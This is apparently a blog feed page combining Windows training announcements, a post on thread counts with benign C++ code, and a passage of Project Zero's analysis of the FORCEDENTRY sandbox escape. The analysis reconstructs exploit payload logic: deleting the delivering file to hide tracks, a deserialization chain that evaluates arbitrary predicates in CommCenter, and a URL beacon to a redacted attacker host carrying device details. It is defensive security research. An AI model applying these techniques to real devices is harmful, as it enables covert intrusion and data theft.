
Next COM Programming Class

5 February 2022 at 10:42

Update: the class is cancelled. I guess there weren’t that many people interested in COM this time around.

Today I’m opening registration for the COM Programming class to be held in April. The syllabus for the 3 day class can be found here. The course will be delivered in 6 half-days (4 hours each).

Dates: April (25, 26, 27, 28), May (2, 3).
Times: 2pm to 6pm, London time
Cost: 700 USD (if paid by an individual), 1300 USD (if paid by a company).

The class will be conducted remotely using Microsoft Teams or a similar platform.

What you need to know before the class: You should be comfortable using Windows on a Power User level. Concepts such as processes, threads, DLLs, and virtual memory should be understood fairly well. You should have experience writing code in C and some C++. You don’t have to be an expert, but you must know C and basic C++ to get the most out of this class. In case you have doubts, talk to me.

Participants in my Windows Internals and Windows System Programming classes have the required knowledge for the class.

We’ll start by looking at why COM was created in the first place, and then build clients and servers, digging into various mechanisms COM provides. See the syllabus for more details.

Previous students in my classes get 10% off. Multiple participants from the same company get a discount (email me for the details).

To register, send an email to [email protected] with the title “COM Training”, and write the name(s), email(s) and time zone(s) of the participants.


zodiacon

Registration is open for the Windows Internals training

16 March 2022 at 13:13

My schedule has been a mess in recent months, and continues to be so for the next few months. However, I am opening registration today for the Windows Internals training with some date changes from my initial plan.

Here are the dates and times (all based on London time) – 5 days total:

  • July 6: 4pm to 12am (full day)
  • July 7: 4pm to 8pm
  • July 11: 4pm to 12am (full day)
  • July 12, 13, 14, 18, 19: 4pm to 8pm

Training cost is 800 USD, if paid by an individual, or 1500 USD if paid by a company. Participants from Ukraine (please provide some proof) are welcome with a 90% discount (paying 80 USD, individual payments only).

If you’d like to register, please send me an email to [email protected] with “Windows Internals training” in the title, provide your full name, company (if any), preferred contact email, and your time zone. The basic syllabus can be found here. If you’ve sent me an email before when I posted about my upcoming classes, you don’t have to do that again – I will send full details soon.

The sessions will be recorded, so you can watch any part you may have missed, or that may be somewhat overwhelming in “real time”.

As usual, if you have any questions, feel free to send me an email, or DM me on Twitter (@zodiacon) or LinkedIn (https://www.linkedin.com/in/pavely/).


zodiacon

Threads, Threads, and More Threads

21 March 2022 at 11:00

Looking at a typical Windows system shows thousands of threads spread across hundreds of processes, even though total CPU consumption is low – meaning most of these threads are doing nothing most of the time. I typically rant about this in my Windows Internals classes. Why so many threads?

Here is a snapshot of my Task Manager showing the total number of threads and processes:

Showing process details and sorting by thread count looks something like this:

The System process clearly has many threads. These are kernel threads created by the kernel itself and by device drivers. These threads are always running in kernel mode. For this post, I’ll disregard the System process and focus on “normal” user-mode processes.

There are other kernel processes that we should ignore, such as Registry and Memory Compression. Registry has few threads, but Memory Compression has many. It’s not shown in Task Manager (by design), but is shown in other tools, such as Process Explorer. While I’m writing this post, it has 78 threads. We should probably skip that process as well as being “out of our control”.

Notice the large number of threads in processes running the images Explorer.exe, SearchIndexer.exe, Nvidia Web helper.exe, Outlook.exe, Powerpnt.exe and MsMpEng.exe. Let’s write some code to calculate the average number of threads in a process and the standard deviation:

#include <windows.h>
#include <tlhelp32.h>
#include <algorithm>
#include <cassert>
#include <cmath>
#include <cstdio>
#include <vector>

float ComputeStdDev(std::vector<int> const& values, float& average) {
	float total = 0;
	std::for_each(values.begin(), values.end(), 
		[&](int n) { total += n; });
	average = total / values.size();
	total = 0;
	std::for_each(values.begin(), values.end(), 
		[&](int n) { total += (n - average) * (n - average); });
	return std::sqrt(total / values.size());
}

int main() {
	auto hSnapshot = ::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	
	PROCESSENTRY32 pe;
	pe.dwSize = sizeof(pe);

	// skip the idle process
	::Process32First(hSnapshot, &pe);

	int processes = 0, threads = 0;
	std::vector<int> threads_per_process;
	threads_per_process.reserve(500);
	while (::Process32Next(hSnapshot, &pe)) {
		processes++;
		threads += pe.cntThreads;
		threads_per_process.push_back(pe.cntThreads);
	}
	::CloseHandle(hSnapshot);

	assert(processes == threads_per_process.size());

	printf("Process: %d Threads: %d\n", processes, threads);
	float average;
	auto sd = ComputeStdDev(threads_per_process, average);
	printf("Average threads/process: %.2f\n", average);
	printf("Std. Dev.: %.2f\n", sd);

	return 0;
}

The ComputeStdDev function computes the standard deviation and average of a vector of integers. The main function uses the ToolHelp API to enumerate the processes in the system, which conveniently also provides the number of threads in each process (stored in the threads_per_process vector). If I run this (no processes removed just yet), this is what I get:

Process: 525 Threads: 7810
Average threads/process: 14.88
Std. Dev.: 23.38

Almost 15 threads per process, with little CPU consumption showing in my Task Manager. The standard deviation is more telling – it’s big compared to the average, which suggests that many processes are far from the average in their thread consumption. And since a negative thread count is not possible (even zero is almost impossible), the divergence is towards higher thread counts.

To be fair, let’s remove the System and Memory Compression processes from our calculations. Here are the changes to the while loop:

while (::Process32Next(hSnapshot, &pe)) {
	if (pe.th32ProcessID == 4 || _wcsicmp(pe.szExeFile, L"memory compression") == 0)
		continue;
//...

Here are the results:

Process: 521 Threads: 7412
Average threads/process: 14.23
Std. Dev.: 14.14

The standard deviation is definitely smaller, but still pretty big (close to the average), which does not invalidate the previous point. Some processes use lots of threads.

In an ideal world, the number of threads in a system would be the same as the number of logical processors – any more and threads might fight over processors, any less and you’re not using the full power of the machine. Obviously, each “normal” process must have at least one thread running whatever main function is available in the executable, so on my system 521 threads would be the minimum number of threads. Still – we have over 7000.
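
For reference, here is a minimal sketch (my own, not from the post) that queries the logical processor count with the documented GetActiveProcessorCount API – the number you would compare the thread count against:

#include <windows.h>
#include <cstdio>

int main() {
	// Logical processors across all processor groups - roughly the number
	// of threads that could actually run simultaneously on this machine.
	DWORD cpus = ::GetActiveProcessorCount(ALL_PROCESSOR_GROUPS);
	printf("Logical processors: %lu\n", cpus);
	return 0;
}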

What are these threads doing, anyway? Let’s examine some processes. First, an Explorer.exe process. Here is the Threads tab shown in Process Explorer:

Thread list in Explorer.exe instance

93 threads. I’ve sorted the list by Start Address to get a sense of the common functions used. Let’s dig into some of them. One of the most common (in other processes as well) is ntdll!TppWorkerThread – this is a thread pool thread, likely waiting for work. Clicking the Stack button (or double clicking the entry in the list) shows the following call stack:

ntoskrnl.exe!KiSwapContext+0x76
ntoskrnl.exe!KiSwapThread+0x500
ntoskrnl.exe!KiCommitThreadWait+0x14f
ntoskrnl.exe!KeWaitForSingleObject+0x233
ntoskrnl.exe!KiSchedulerApc+0x3bd
ntoskrnl.exe!KiDeliverApc+0x2e9
ntoskrnl.exe!KiSwapThread+0x827
ntoskrnl.exe!KiCommitThreadWait+0x14f
ntoskrnl.exe!KeRemoveQueueEx+0x263
ntoskrnl.exe!IoRemoveIoCompletion+0x98
ntoskrnl.exe!NtWaitForWorkViaWorkerFactory+0x38e
ntoskrnl.exe!KiSystemServiceCopyEnd+0x25
ntdll.dll!ZwWaitForWorkViaWorkerFactory+0x14
ntdll.dll!TppWorkerThread+0x2f7
KERNEL32.DLL!BaseThreadInitThunk+0x14
ntdll.dll!RtlUserThreadStart+0x21

The system call NtWaitForWorkViaWorkerFactory is the one waiting for work (the name Worker Factory is the internal name of the thread pool type in the kernel, officially called TpWorkerFactory). The number of such threads is typically dynamic, growing and shrinking based on the amount of work provided to the thread pool(s). The minimum and maximum threads can be tweaked by APIs, but most processes are unlikely to do so.
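
For completeness, here is a small sketch (mine, not from the post) of the API in question: a private thread pool whose minimum and maximum thread counts are constrained with SetThreadpoolThreadMinimum/Maximum:

#include <windows.h>

void CALLBACK DoWork(PTP_CALLBACK_INSTANCE, PVOID, PTP_WORK) {
	// the actual work item
}

int main() {
	// A private pool (separate from the process-default pool) whose
	// thread limits we control explicitly.
	PTP_POOL pool = ::CreateThreadpool(nullptr);
	if (!pool)
		return 1;
	::SetThreadpoolThreadMaximum(pool, 2);
	::SetThreadpoolThreadMinimum(pool, 1);

	// Route work items to that pool via a callback environment.
	TP_CALLBACK_ENVIRON env;
	::InitializeThreadpoolEnvironment(&env);
	::SetThreadpoolCallbackPool(&env, pool);

	PTP_WORK work = ::CreateThreadpoolWork(DoWork, nullptr, &env);
	::SubmitThreadpoolWork(work);
	::WaitForThreadpoolWorkCallbacks(work, FALSE);

	::CloseThreadpoolWork(work);
	::DestroyThreadpoolEnvironment(&env);
	::CloseThreadpool(pool);
	return 0;
}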

Another function that appears a lot in the list is shcore.dll!_WrapperThreadProc. It looks like some generic function used by Explorer for its own threads. We can examine some call stacks to get a sense of what’s going on. Here is one:

ntoskrnl.exe!KiSwapContext+0x76
ntoskrnl.exe!KiSwapThread+0x500
ntoskrnl.exe!KiCommitThreadWait+0x14f
ntoskrnl.exe!KeWaitForSingleObject+0x233
ntoskrnl.exe!KiSchedulerApc+0x3bd
ntoskrnl.exe!KiDeliverApc+0x2e9
ntoskrnl.exe!KiSwapThread+0x827
ntoskrnl.exe!KiCommitThreadWait+0x14f
ntoskrnl.exe!KeWaitForSingleObject+0x233
ntoskrnl.exe!KeWaitForMultipleObjects+0x45b
win32kfull.sys!xxxRealSleepThread+0x362
win32kfull.sys!xxxSleepThread2+0xb5
win32kfull.sys!xxxRealInternalGetMessage+0xcfd
win32kfull.sys!NtUserGetMessage+0x92
win32k.sys!NtUserGetMessage+0x16
ntoskrnl.exe!KiSystemServiceCopyEnd+0x25
win32u.dll!NtUserGetMessage+0x14
USER32.dll!GetMessageW+0x2e
SHELL32.dll!_LocalServerThread+0x66
shcore.dll!_WrapperThreadProc+0xe9
KERNEL32.DLL!BaseThreadInitThunk+0x14
ntdll.dll!RtlUserThreadStart+0x21

This one seems to be waiting for UI messages, probably managing some user interface (GetMessage). We can verify with other tools. Here is my own WinSpy:

Apparently, I was wrong. This thread hosts the hidden window used to receive messages targeting COM objects that live in this Single Threaded Apartment (STA).

We can inspect WinSpy some more to see the threads and windows created by Explorer. I’ll leave that to the interested reader.

Other generic call stacks start with ucrtbase.dll!thread_start+0x42. Many of them have the following call stack (kernel part trimmed for brevity):

ntdll.dll!ZwWaitForMultipleObjects+0x14
KERNELBASE.dll!WaitForMultipleObjectsEx+0xf0
KERNELBASE.dll!WaitForMultipleObjects+0xe
cdp.dll!shared::CallbackNotifierListener::ListenerInternal::StartInternal+0x9f
cdp.dll!std::thread::_Invoke<std::tuple<<lambda_10793e1829a048bb2f8cc95974633b56> >,0>+0x2f
ucrtbase.dll!thread_start<unsigned int (__cdecl*)(void *),1>+0x42
KERNEL32.DLL!BaseThreadInitThunk+0x14
ntdll.dll!RtlUserThreadStart+0x21

A function in CDP.dll is waiting for something (WaitForMultipleObjects). I count at least 12 threads doing just that. Perhaps all these waits could be consolidated to a smaller number of threads?
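
As an illustration of what such consolidation could look like (a sketch of mine, not something CDP.dll actually does), the Windows thread pool can register many waits without dedicating a blocked thread to each handle:

#include <windows.h>
#include <vector>

// Called on a thread pool thread when the registered handle is signaled -
// no dedicated waiting thread is needed per handle.
void CALLBACK OnSignaled(PTP_CALLBACK_INSTANCE, PVOID context, PTP_WAIT wait, TP_WAIT_RESULT) {
	// handle the event passed in 'context', then re-arm the wait
	::SetThreadpoolWait(wait, static_cast<HANDLE>(context), nullptr);
}

int main() {
	std::vector<HANDLE> events;
	std::vector<PTP_WAIT> waits;
	for (int i = 0; i < 12; i++) {
		HANDLE ev = ::CreateEvent(nullptr, FALSE, FALSE, nullptr);
		PTP_WAIT wait = ::CreateThreadpoolWait(OnSignaled, ev, nullptr);
		::SetThreadpoolWait(wait, ev, nullptr);	// arm the wait
		events.push_back(ev);
		waits.push_back(wait);
	}
	// ... the rest of the process runs; no 12 threads blocked in wait calls ...
	::Sleep(1000);
	for (auto w : waits) {
		::SetThreadpoolWait(w, nullptr, nullptr);	// stop listening
		::WaitForThreadpoolWaitCallbacks(w, TRUE);
		::CloseThreadpoolWait(w);
	}
	for (auto e : events)
		::CloseHandle(e);
	return 0;
}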

Let’s tackle a different process. Here is an instance of Teams.exe. My Teams is minimized to the tray and I have not interacted with it for a while:

Teams threads

62 threads. Many have the same CRT wrapper for a thread created by Teams. Here are several call stacks I observed:

ntdll.dll!ZwRemoveIoCompletion+0x14
KERNELBASE.dll!GetQueuedCompletionStatus+0x4f
skypert.dll!rtnet::internal::SingleThreadIOCP::iocpLoop+0x116
skypert.dll!SplOpaqueUpperLayerThread::run+0x84
skypert.dll!auf::priv::MRMWTransport::process1+0x6c
skypert.dll!auf::ThreadPoolExecutorImp::workLoop+0x160
skypert.dll!auf::tpImpThreadTrampoline+0x47
skypert.dll!spl::threadWinDispatch+0x19
skypert.dll!spl::threadWinEntry+0x17b
ucrtbase.dll!thread_start<unsigned int (__cdecl*)(void *),1>+0x42
KERNEL32.DLL!BaseThreadInitThunk+0x14
ntdll.dll!RtlUserThreadStart+0x21

ntdll.dll!ZwWaitForAlertByThreadId+0x14
ntdll.dll!RtlSleepConditionVariableCS+0x105
KERNELBASE.dll!SleepConditionVariableCS+0x29
Teams.exe!uv_cond_wait+0x10
Teams.exe!worker+0x8d
Teams.exe!uv__thread_start+0xa2
Teams.exe!thread_start<unsigned int (__cdecl*)(void *),1>+0x50
KERNEL32.DLL!BaseThreadInitThunk+0x14
ntdll.dll!RtlUserThreadStart+0x21

You can check more threads, but you get the idea. Most threads are waiting for something – this is not the ideal activity for a thread. A thread should run (useful) code.

Last example, Word:

57 threads. Word has been minimized for more than an hour now. The most common call stack looks like this:

ntdll.dll!ZwWaitForAlertByThreadId+0x14
ntdll.dll!RtlSleepConditionVariableSRW+0x131
KERNELBASE.dll!SleepConditionVariableSRW+0x29
v8jsi.dll!CrashForExceptionInNonABICompliantCodeRange+0x4092f6
v8jsi.dll!CrashForExceptionInNonABICompliantCodeRange+0x11ff2
v8jsi.dll!v8_inspector::V8StackTrace::topScriptIdAsInteger+0x43ad0
ucrtbase.dll!thread_start<unsigned int (__cdecl*)(void *),1>+0x42
KERNEL32.DLL!BaseThreadInitThunk+0x14
ntdll.dll!RtlUserThreadStart+0x21

v8jsi.dll is the React Native v8 engine – it’s creating many threads, most of which are doing nothing. I found it in Outlook and PowerPoint as well.

Many applications today depend on various libraries and frameworks, some of which don’t seem to care too much about using threads economically – examples include Node.js, the Electron framework, even Java and .NET. Threads are not free – there is the ETHREAD and related data structures in the kernel, stack in kernel space, and stack in user space. Context switches and code run by the kernel scheduler when threads change states from Running to Waiting, and from Waiting to Ready are not free, either.

Many desktop/laptop systems today are very powerful and it might seem everything is fine. I don’t think so. Developers use so many layers of abstraction these days, that we sometimes forget there are actual processors that execute the code, and need to use memory and other resources. None of that is free.


zodiacon

FORCEDENTRY: Sandbox Escape

31 March 2022 at 16:00

Posted by Ian Beer & Samuel Groß of Google Project Zero

We want to thank Citizen Lab for sharing a sample of the FORCEDENTRY exploit with us, and Apple’s Security Engineering and Architecture (SEAR) group for collaborating with us on the technical analysis. Any editorial opinions reflected below are solely Project Zero’s and do not necessarily reflect those of the organizations we collaborated with during this research.

Late last year we published a writeup of the initial remote code execution stage of FORCEDENTRY, the zero-click iMessage exploit attributed by Citizen Lab to NSO. By sending a .gif iMessage attachment (which was really a PDF) NSO were able to remotely trigger a heap buffer overflow in the ImageIO JBIG2 decoder. They used that vulnerability to bootstrap a powerful weird machine capable of loading the next stage in the infection process: the sandbox escape.

In this post we'll take a look at that sandbox escape. It's notable for using only logic bugs. In fact it's unclear where the features that it uses end and the vulnerabilities which it abuses begin. Both current and upcoming state-of-the-art mitigations such as Pointer Authentication and Memory Tagging have no impact at all on this sandbox escape.

An observation

During our initial analysis of the .gif file Samuel noticed that rendering the image appeared to leak memory. Running the heap tool after releasing all the associated resources gave the following output:

$ heap $pid
------------------------------------------------------------
All zones: 4631 nodes (826336 bytes)

   COUNT    BYTES     AVG   CLASS_NAME   TYPE   BINARY
   =====    =====     ===   ==========   ====   ======
    1969   469120   238.3   non-object
     825    26400    32.0   JBIG2Bitmap  C++   CoreGraphics

heap was able to determine that the leaked memory contained JBIG2Bitmap objects.

Using the -address option we could find all the individual leaked bitmap objects:

$ heap -address JBIG2Bitmap $pid

and dump them out to files. One of those objects was quite unlike the others:

$ hexdump -C dumpXX.bin | head
00000000  62 70 6c 69 73 74 30 30  |bplist00|
...
00000018        24 76 65 72 73 69  |  $versi|
00000020  6f 6e 59 24 61 72 63 68  |onY$arch|
00000028  69 76 65 72 58 24 6f 62  |iverX$ob|
00000030  6a 65 63 74 73 54 24 74  |jectsT$t|
00000038  6f 70                    |op      |
00000040        4e 53 4b 65 79 65  |  NSKeye|
00000048  64 41 72 63 68 69 76 65  |dArchive|

It's clearly a serialized NSKeyedArchiver. Definitely not what you'd expect to see in a JBIG2Bitmap object. Running strings we see plenty of interesting things (noting that the URL below is redacted):

Objective-C class and selector names:

NSFunctionExpression
NSConstantValueExpression
NSConstantValue
expressionValueWithObject:context:
filteredArrayUsingPredicate:
_web_removeFileOnlyAtPath:
context:evaluateMobileSubscriberIdentity:
performSelectorOnMainThread:withObject:waitUntilDone:
...

The name of the file which delivered the exploit:

XXX.gif

Filesystem paths:

/tmp/com.apple.messages
/System/Library/PrivateFrameworks/SlideshowKit.framework/Frameworks/OpusFoundation.framework

a URL:

https://XXX.cloudfront.net/YYY/ZZZ/megalodon?AAA

Using plutil we can convert the bplist00 binary format to XML. Performing some post-processing and cleanup we can see that the top-level object in the NSKeyedArchiver is a serialized NSFunctionExpression object.

NSExpression NSPredicate NSExpression

If you've ever used Core Data or tried to filter a Objective-C collection you might have come across NSPredicates. According to Apple's public documentation they are used "to define logical conditions for constraining a search for a fetch or for in-memory filtering".

For example, in Objective-C you could filter an NSArray object like this:

  NSArray* names = @[@"one", @"two", @"three"];
  NSPredicate* pred;
  pred = [NSPredicate predicateWithFormat: @"SELF beginswith[c] 't'"];
  NSLog(@"%@", [names filteredArrayUsingPredicate:pred]);

The predicate is "SELF beginswith[c] 't'". This prints an NSArray containing only "two" and "three".

[NSPredicate predicateWithFormat] builds a predicate object by parsing a small query language, a little like an SQL query.

NSPredicates can be built up from NSExpressions, connected by NSComparisonPredicates (like less-than, greater-than and so on.)

NSExpressions themselves can be fairly complex, containing aggregate expressions (like "IN" and "CONTAINS"), subqueries, set expressions, and, most interestingly, function expressions.

Prior to 2007 (in OS X 10.4 and below) function expressions were limited to just the following five extra built-in methods: sum, count, min, max, and average.

But starting in OS X 10.5 (which would also be around the launch of iOS in 2007) NSFunctionExpressions were extended to allow arbitrary method invocations with the FUNCTION keyword:

  "FUNCTION('abc', 'stringByAppendingString', 'def')" => @"abcdef"

FUNCTION takes a target object, a selector and an optional list of arguments then invokes the selector on the object, passing the arguments. In this case it will allocate an NSString object @"abc" then invoke the stringByAppendingString: selector passing the NSString @"def", which will evaluate to the NSString @"abcdef".

In addition to the FUNCTION keyword there's CAST which allows full reflection-based access to all Objective-C types (as opposed to just being able to invoke selectors on literal strings and integers):

  "FUNCTION(CAST('NSFileManager', 'Class'), 'defaultManager')"

Here we can get access to the NSFileManager class and call the defaultManager selector to get a reference to a process's shared file manager instance.

These keywords exist in the string representation of NSPredicates and NSExpressions. Parsing those strings involves creating a graph of NSExpression objects, NSPredicate objects and their subclasses like NSFunctionExpression. It's a serialized version of such a graph which is present in the JBIG2 bitmap.

NSPredicates using the FUNCTION keyword are effectively Objective-C scripts. With some tricks it's possible to build nested function calls which can do almost anything you could do in procedural Objective-C. Figuring out some of those tricks was the key to the 2019 Real World CTF DezhouInstrumenz challenge, which would evaluate an attacker supplied NSExpression format string. The writeup by the challenge author is a great introduction to these ideas and I'd strongly recommend reading that now if you haven't. The rest of this post builds on the tricks described in that post.

A tale of two parts

The only job of the JBIG2 logic gate machine described in the previous blog post is to cause the deserialization and evaluation of an embedded NSFunctionExpression. No attempt is made to get native code execution, ROP, JOP or any similar technique.

Prior to iOS 14.5 the isa field of an Objective-C object was not protected by Pointer Authentication Codes (PAC), so the JBIG2 machine builds a fake Objective-C object with a fake isa such that the invocation of the dealloc selector causes the deserialization and evaluation of the NSFunctionExpression. This is very similar to the technique used by Samuel in the 2020 SLOP post.

This NSFunctionExpression has two purposes:

Firstly, it allocates and leaks an AMSKeepAlive object then tries to cover its tracks by finding and deleting the .gif file which delivered the exploit.

Secondly, it builds a payload NSPredicate object then triggers a logic bug to get that NSPredicate object evaluated in the CommCenter process, reachable from the IMTranscoderAgent sandbox via the com.apple.commcenter.xpc NSXPC service.

Let's look at those two parts separately:

Covering tracks

The outer level NSFunctionExpression calls performSelectorOnMainThread:withObject:waitUntilDone which in turn calls makeObjectsPerformSelector:@"expressionValueWithObject:context:" on an NSArray of four NSFunctionExpressions. This allows the four independent NSFunctionExpressions to be evaluated sequentially.

With some manual cleanup we can recover pseudo-Objective-C versions of the serialized NSFunctionExpressions.

The first one does this:

[[AMSKeepAlive alloc] initWithName:"KA"]

This allocates and then leaks an AppleMediaServices KeepAlive object. The exact purpose of this is unclear.

The second entry does this:

[[NSFileManager defaultManager] _web_removeFileOnlyAtPath:
  [@"/tmp/com.apple.messages" stringByAppendingPathComponent:
    [ [ [ [
            [NSFileManager defaultManager]
            enumeratorAtPath: @"/tmp/com.apple.messages"
          ]
          allObjects
        ]
        filteredArrayUsingPredicate:
          [
            [NSPredicate predicateWithFormat:
              [
                [@"SELF ENDSWITH '"
                  stringByAppendingString: "XXX.gif"]
                stringByAppendingString: "'"
      ]   ] ] ]
      firstObject
    ]
  ]
]

Reading these single expression NSFunctionExpressions is a little tricky; breaking that down into a more procedural form it's equivalent to this:

NSFileManager* fm = [NSFileManager defaultManager];
NSDirectoryEnumerator* dir_enum;
dir_enum = [fm enumeratorAtPath: @"/tmp/com.apple.messages"];
NSArray* allTmpFiles = [dir_enum allObjects];

NSString* filter;
filter = [@"SELF ENDSWITH '" stringByAppendingString: "XXX.gif"];
filter = [filter stringByAppendingString: "'"];

NSPredicate* pred;
pred = [NSPredicate predicateWithFormat: filter];

NSArray* matches;
matches = [allTmpFiles filteredArrayUsingPredicate: pred];
NSString* gif_subpath = [matches firstObject];

NSString* root = @"/tmp/com.apple.messages";
NSString* full_path;
full_path = [root stringByAppendingPathComponent: gif_subpath];

[fm _web_removeFileOnlyAtPath: full_path];

This finds the XXX.gif file used to deliver the exploit which iMessage has stored somewhere under the /tmp/com.apple.messages folder and deletes it.

The other two NSFunctionExpressions build a payload and then trigger its evaluation in CommCenter. For that we need to look at NSXPC.

NSXPC

NSXPC is a semi-transparent remote-procedure-call mechanism for Objective-C. It allows the instantiation of proxy objects in one process which transparently forward method calls to the "real" object in another process:

https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html

I say NSXPC is only semi-transparent because it does enforce some restrictions on what objects are allowed to traverse process boundaries. Any object "exported" via NSXPC must also define a protocol which designates which methods can be invoked and the allowable types for each argument. The NSXPC programming guide further explains the extra handling required for methods which require collections and other edge cases.

The low-level serialization used by NSXPC is the same explored by Natalie Silvanovich in her 2019 blog post looking at the fully-remote attack surface of the iPhone. An important observation in that post was that subclasses of classes with any level of inheritance are also allowed, as is always the case with NSKeyedUnarchiver deserialization.

This means that any protocol object which declares a particular type for a field will also, by design, accept any subclass of that type.

The logical extreme of this would be that a protocol which declared an argument type of NSObject would allow any subclass, which is the vast majority of all Objective-C classes.

Grep to the rescue

This is fairly easy to analyze automatically. Protocols are defined statically so we can just find them and check each one. Tools like RuntimeBrowser and classdump can parse the static protocol definitions and output human-readable source code. Grepping the output of RuntimeBrowser like this is sufficient to find dozens of cases of NSObject pointers in Objective-C protocols:

  $ egrep -Rn "\(NSObject \*\)arg" *

Not all the results are necessarily exposed via NSXPC, but some clearly are, including the following two matches in CoreTelephony.framework:

Frameworks/CoreTelephony.framework/\
CTXPCServiceSubscriberInterface-Protocol.h:39:
-(void)evaluateMobileSubscriberIdentity:
        (CTXPCServiceSubscriptionContext *)arg1
       identity:(NSObject *)arg2
       completion:(void (^)(NSError *))arg3;

Frameworks/CoreTelephony.framework/\
CTXPCServiceCarrierBundleInterface-Protocol.h:13:
-(void)setWiFiCallingSettingPreferences:
         (CTXPCServiceSubscriptionContext *)arg1
       key:(NSString *)arg2
       value:(NSObject *)arg3
       completion:(void (^)(NSError *))arg4;

The evaluateMobileSubscriberIdentity string appears in the list of selector-like strings we first saw when running strings on the bplist00. Indeed, looking at the parsed and beautified NSFunctionExpression we see it doing this:

[ [ [CoreTelephonyClient alloc] init]
  context:X
  evaluateMobileSubscriberIdentity:Y]

This is a wrapper around the lower-level NSXPC code and the argument passed as Y above to the CoreTelephonyClient method corresponds to the identity:(NSObject *)arg2 argument passed via NSXPC to CommCenter (which is the process that hosts com.apple.commcenter.xpc, the NSXPC service underlying the CoreTelephonyClient). Since the parameter is explicitly named as NSObject* we can in fact pass any subclass of NSObject*, including an NSPredicate! Game over?

Parsing vs Evaluation

It's not quite that easy. The DezhouInstrumentz writeup discusses this attack surface and notes that there's an extra, specific mitigation. When an NSPredicate is deserialized by its initWithCoder: implementation it sets a flag which disables evaluation of the predicate until the allowEvaluation method is called.

So whilst you certainly can pass an NSPredicate* as the identity argument across NSXPC and get it deserialized in CommCenter, the implementation of evaluateMobileSubscriberIdentity: in CommCenter is definitely not going to call allowEvaluation: to mark the predicate as safe for evaluation and then evaluateWithObject: to actually evaluate it.

Old techniques, new tricks

From the exploit we can see that they in fact pass an NSArray with two elements:

[0] = AVSpeechSynthesisVoice
[1] = PTSection { rows = NSArray { [0] = PTRow() } }

The first element is an AVSpeechSynthesisVoice object and the second is a PTSection containing a single PTRow. Why?

PTSection and PTRow are both defined in the PrototypeTools private framework. PrototypeTools isn't loaded in the CommCenter target process. Let's look at what happens when an AVSpeechSynthesisVoice is deserialized:

Finding a voice

AVSpeechSynthesisVoice is implemented in AVFAudio.framework, which is loaded in CommCenter:

$ sudo vmmap `pgrep CommCenter` | grep AVFAudio
__TEXT  7ffa22c4c000-7ffa22d44000 r-x/r-x SM=COW \
/System/Library/Frameworks/AVFAudio.framework/Versions/A/AVFAudio

Assuming that this was the first time that an AVSpeechSynthesisVoice object was created inside CommCenter (which is quite likely) the Objective-C runtime will call the initialize method on the AVSpeechSynthesisVoice class before instantiating the first instance.

[AVSpeechSynthesisVoice initialize] has a dispatch_once block with the following code:

NSBundle* bundle;
bundle = [NSBundle bundleWithPath:
                     @"/System/Library/AccessibilityBundles/\
                         AXSpeechImplementation.bundle"];
if (![bundle isLoaded]) {
    NSError* err = nil;
    [bundle loadAndReturnError:&err];
}

So sending a serialized AVSpeechSynthesisVoice object will cause CommCenter to load the /System/Library/AccessibilityBundles/AXSpeechImplementation.bundle library. With some scripting using otool -L to list dependencies we can  find the following dependency chain from AXSpeechImplementation.bundle to PrototypeTools.framework:

['/System/Library/AccessibilityBundles/\
    AXSpeechImplementation.bundle/AXSpeechImplementation',
 '/System/Library/AccessibilityBundles/\
    AXSpeechImplementation.bundle/AXSpeechImplementation',
 '/System/Library/PrivateFrameworks/\
    AccessibilityUtilities.framework/AccessibilityUtilities',
 '/System/Library/PrivateFrameworks/\
    AccessibilitySharedSupport.framework/AccessibilitySharedSupport',
 '/System/Library/PrivateFrameworks/Sharing.framework/Sharing',
 '/System/Library/PrivateFrameworks/\
    PrototypeTools.framework/PrototypeTools']

This explains how the deserialization of a PTSection will succeed. But what's so special about PTSections and PTRows?

Predicated Sections

[PTRow initWithCoder:] contains the following snippet:

  self->condition = [coder decodeObjectOfClass:NSPredicate
                           forKey:@"condition"]
  [self->condition allowEvaluation]

This will deserialize an NSPredicate object, assign it to the PTRow member variable condition and call allowEvaluation. This is meant to indicate that the deserializing code considers the predicate safe, but there's no attempt to perform any validation of the predicate contents here. They then need one more trick: a code path which will actually evaluate the PTRow's condition predicate.

Here's a snippet from [PTSection initWithCoder:]:

NSSet* allowed = [NSSet setWithObjects: @[PTRow]]
id* rows = [coder decodeObjectOfClasses:allowed forKey:@"rows"]
[self initWithRows:rows]

This deserializes an array of PTRows and passes them to [PTSection initWithRows] which assigns a copy of the array of PTRows to PTSection->rows then calls [self _reloadEnabledRows] which in turn passes each row to [self _shouldEnableRow:]

_shouldEnableRow:row {
  if (row->condition) {
    return [row->condition evaluateWithObject: self->settings]
  }
}

And thus, by sending a PTSection containing a single PTRow with an attached condition NSPredicate they can cause the evaluation of an arbitrary NSPredicate, effectively equivalent to arbitrary code execution in the context of CommCenter.

Payload 2

The NSPredicate attached to the PTRow uses a similar trick to the first payload to cause the evaluation of six independent NSFunctionExpressions, but this time in the context of the CommCenter process. They're presented here in pseudo Objective-C:

Expression 1

[  [CaliCalendarAnonymizer sharedAnonymizedStrings]
   setObject:
     @[[NSURLComponents
         componentsWithString:
         @"https://cloudfront.net/XXX/XXX/XXX?aaaa"], '0']
   forKey: @"0"
]

The use of [CaliCalendarAnonymizer sharedAnonymizedStrings] is a trick to enable the array of independent NSFunctionExpressions to have "local variables". In this first case they create an NSURLComponents object which is used to build parameterised URLs. This URL builder is then stored in the global dictionary returned by [CaliCalendarAnonymizer sharedAnonymizedStrings] under the key "0".

Expression 2

[[NSBundle
  bundleWithPath:@"/System/Library/PrivateFrameworks/\
     SlideshowKit.framework/Frameworks/OpusFoundation.framework"
 ] load]

This causes the OpusFoundation library to be loaded. The exact reason for this is unclear, though the dependency graph of OpusFoundation does include AuthKit which is used by the next NSFunctionExpression. It's possible that this payload is generic and might also be expected to work when evaluated in processes where AuthKit isn't loaded.

Expression 3

[ [ [CaliCalendarAnonymizer sharedAnonymizedStrings]
    objectForKey:@"0" ]
  setQueryItems:
    [ [ [NSArray arrayWithObject:
                 [NSURLQueryItem
                    queryItemWithName: @"m"
                    value:[AKDevice _hardwareModel] ]
                                 ] arrayByAddingObject:
                 [NSURLQueryItem
                    queryItemWithName: @"v"
                    value:[AKDevice _buildNumber] ]
                                 ] arrayByAddingObject:
                 [NSURLQueryItem
                    queryItemWithName: @"u"
                    value:[NSString randomString]]
]

This grabs a reference to the NSURLComponents object stored under the "0" key in the global sharedAnonymizedStrings dictionary then parameterizes the HTTP query string with three values:

